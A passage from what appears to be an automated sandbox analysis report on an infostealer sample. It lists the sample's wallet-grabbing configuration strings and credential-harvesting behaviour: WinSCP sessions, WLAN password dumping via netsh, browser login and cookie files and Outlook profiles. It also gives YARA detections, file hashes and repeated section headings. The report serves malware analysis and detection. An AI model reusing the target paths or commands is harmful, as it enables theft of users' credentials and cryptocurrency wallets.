name="0"><args><string>%AppData%\Electrum\wallets</string><string></string><string>Grabber\Wallets\Electrum</string></args></command><command name="0"><args><string>%AppData%\Electrum-LTC\wallets</string><string></string><string>Grabber\Wallets\Electrum-LTC</string></args></command><command name="0"><args><string>%AppData%\Zcash</string><string>walletdat</string><string>Grabber\Wallets\Zcash</string></args></command><command name="0"><args><string>%AppData%\Exodus</string><string>exodus.conf.json;exodus.wallet\.seco</string><string>Grabber\Wallets\Exodus</string></args></command><command name="0"><args><string>%AppData%\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxLiberty</string></args></command><command name="0"><args><string>%AppData%\Jaxx\Local Storage\leveldb</string><string>.l??</string><string>Grabber\Wallets\JaxxClassic</string></args></command><command name="0"><args><string>%UserProfile%\Documents\Monero\wallets</string><string>\</string><string>Grabber\Wallets\Monero</string></args></command><command name="0"><args><string>%AppData%\MyMonero</string><string>FundsRequests;PasswordMeta;Wallets*</string><string>Grabber\Wallets\MyMonero</string></args></command><command name="3"><args><string>Metamask</string><string>nkbihfbeogaeaoehlefnkodbefgpgknn</string><
Source: powershell.exe, 00000001.00000002.1715254235.00000000062C6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: # AutoUnlockKeyStored. Win32_EncryptableVolume::IsAutoUnlockKeyStored

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions			Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal WLAN passwords

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Process created: C:\Windows\System32\cmd.exe cmd.exe" /c chcp 65001 && netsh wlan show profiles\|findstr /R /C:"[ ]:[ ]
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.db
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqlite
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqlite
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676			Jump to behavior
Source: C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Yara detected Credential Stealer

Source: Yara match	File source: 00000012.00000002.2064616867.0000010DD73F1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000002.4118051146.000001B8AB951000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Remote Access Functionality

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000002D.00000002.3553295709.00000167D1889000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002C.00000002.2953825020.000001EC01AD9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000004.00000002.1822502459.000001F997DF1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000002A.00000002.2312217329.0000017A00001000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7316, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7712, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 125704, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 325468, type: MEMORYSTR

Yara detected Telegram RAT

Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 7620, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Yara detected WhiteSnake Stealer

Source: Yara match

File source: Process Memory Space: vkefq4cv.oil.exe PID: 8072, type: MEMORYSTR

Windows Analysis Report
jqOHOuPMJP.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

ID:	1390172
Product:	CloudBasic
Start time:	16:16:06
Start date:	10.02.2024
Sample:	jqOHOuPMJP.exe
Cookbook:	default.jbs
System description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Architecture:	WINDOWS
MD5:	7e9a93c69aecfc2bbda9470fbd4556db
SHA1:	ab0e810472a897affac1a761b49595939f6897a9
SHA256:	82e68bb4f56181a0b2458f2861aa7b5fa1bb0f4ce30907d579c3b92707ef2647
Filetype:	Win32 Executable (generic) Net Framework (10011505/4) 49.83%

Name	Type	MD5	SHA1	SHA256
C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_vkefq4cv.oil.exe_8bda737a63465ab69884df6bd58af130501f7e94_ea868dc5_2dd495ae-2f75-472c-b3ff-2ce61eb255a3\Report.wer	Unicode text, UTF-16, little-endian text, with CRLF line terminators	8DF9BDA50BBE3450B40A752EFDA35970	9087F9B044B5643151B6E880FA1D4662544B872E	B1554ABADA649C3F418FB4061ECDFA48ED84929AF06F3757DB7AA55203585DB6
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCB81.tmp.dmp	Mini DuMP crash report, 16 streams, Sat Feb 10 15:17:23 2024, 0x1205a4 type	50CEE141B6A528A99DD4F05900D33751	D0CBEBBBF89C29E411F2D067C6B80E1A5C950BD1	38F3BFD3A68F925464D525E9A676B382D9B17CD6A48C47C084E28293D0B82ADE
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE32.tmp.WERInternalMetadata.xml	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators	B7EEBD7DDE9F9346C004426EF7E9285C	BBDC2419A74E5E87623CB49668CB64EF186A8EFB	720E58F20F931C8990B2E2FC684F254003F95E54CF66E3E6F30D4120E7CEBBC1
C:\ProgramData\Microsoft\Windows\WER\Temp\WERCE62.tmp.xml	XML 1.0 document, ASCII text, with CRLF line terminators	C6C49753428EC5380CC37E96E3B673D3	0E2ECEB6D5FD08E35AAAEDB57594070504AAC059	3FF9C8077B9660804B2B607CFBEACD83E8143FE545E83508B4A365EF257A6FEC
C:\Users\user\.ssh\known_hosts	ASCII text, with very long lines (404), with CRLF line terminators	EC266D309CBAD86B3E4939F2117DFE39	CF12599FBDC167B4C01B518A0BD63D51CD83798B	2F8ECCA5380615BCD1530817933A7EA03D2D4FDC7D6E634829AA54E40413B05D
C:\Users\user\AppData\Local\4cn9n9irdf\p.dat	ASCII text, with no line terminators	FCF1D8D2F36C0CDE8ECA4B86A8FE1DF8	C7F9B0FB437533FBD302CC7DCA6D68E101ADCE87	AA522A6BEECBEB04BEAA3F2818524C5FA79D01549B7F330F0CC0DAF925A080EE
C:\Users\user\AppData\Local\4cn9n9irdf\report.lock	very short file (no magic)	C4CA4238A0B923820DCC509A6F75849B	356A192B7913B04C54574D18C28D46E6395428AB	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\vkefq4cv.oil.exe.log	CSV text	578A9969E472E71F38254887263D82A4	8ED7FC31B0F6660DBAC702BC603FBF4FE88B2F5D	AB8369CDA9CB7709E00867CE5460553393ABF742CBD58501AD6113FDF884B938
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jqOHOuPMJP.exe.log	ASCII text, with CRLF line terminators	88593431AEF401417595E7A00FE86E5F	1714B8F6F6DCAAB3F3853EDABA7687F16DD331F4	ED5E60336FB00579E0867B9615CBD0C560BB667FE3CEE0674F690766579F1032
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	data	BAE959C907A8BF1C9DA9D7779AEAB956	7A5EF77FF6B9A251B38EA7284D14F31CE1F72D41	DB9E2A6D8EF4584F7B714716AA2637B2CFD3B8F55939CFE15B0EE3DAD61D7E80
C:\Users\user\AppData\Local\RobloxSecurity\vkefq4cv.oil.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	869F82DF0992DC2F5155D8F69FD1C9CF	5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22	D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2h200bfl.rmg.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jghiq33d.kjq.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mc5dlpdd.are.psm1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nt4c2ncj.tfe.ps1	ASCII text, with no line terminators	D17FE0A3F47BE24A6453E9EF58C94641	6AB83620379FC69F80C0242105DDFFD7D98D5D9D	96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
C:\Users\user\AppData\Local\Temp\hahahahaha.txt	ASCII text, with CRLF line terminators	E10E8583FFEE40E89FEF7419CC14ADA4	1D97614F6E46CB7B87F96740E9C315931BDAF222	615581F4791B9D308FDC033455A8E2F22A01CE236C185908652B8B0A93CFF589
C:\Users\user\AppData\Local\Temp\vkefq4cv.oil.exe	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows	869F82DF0992DC2F5155D8F69FD1C9CF	5B48D32ACA1F7705C03E2BD592F68A2B9C9A7A22	D77412B72A893EE96E82D7EFBD9FC2612176DA00DF5EBC066C13C303F558BCC9
C:\Windows\appcompat\Programs\Amcache.hve	MS Windows registry file, NT/2000 or above	0B41F0D1011D6FFA013E52F811F4F71B	61D222828FC0895D776ABE64598659C31B038EFA	550D698638F5585C2C5605D7BF1D8D2D6CB51795D62A084A5FC1B5B69D4AED55
\Device\Null	ASCII text, with CRLF line terminators, with overstriking	3DD7DD37C304E70A7316FE43B69F421F	A3754CFC33E9CA729444A95E95BCB53384CB51E4	4FA27CE1D904EA973430ADC99062DCF4BAB386A19AB0F8D9A4185FA99067F3AA

Windows Analysis Report jqOHOuPMJP.exe

Overview

General Information

Detection

Signatures

Classification

Signatures

AV Detection

Cryptography

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Screenshots

Behavior Graph

Network Map

Contacted Public IPs

Private

Contacted Domains

Contacted URLs

Windows Analysis Report
jqOHOuPMJP.exe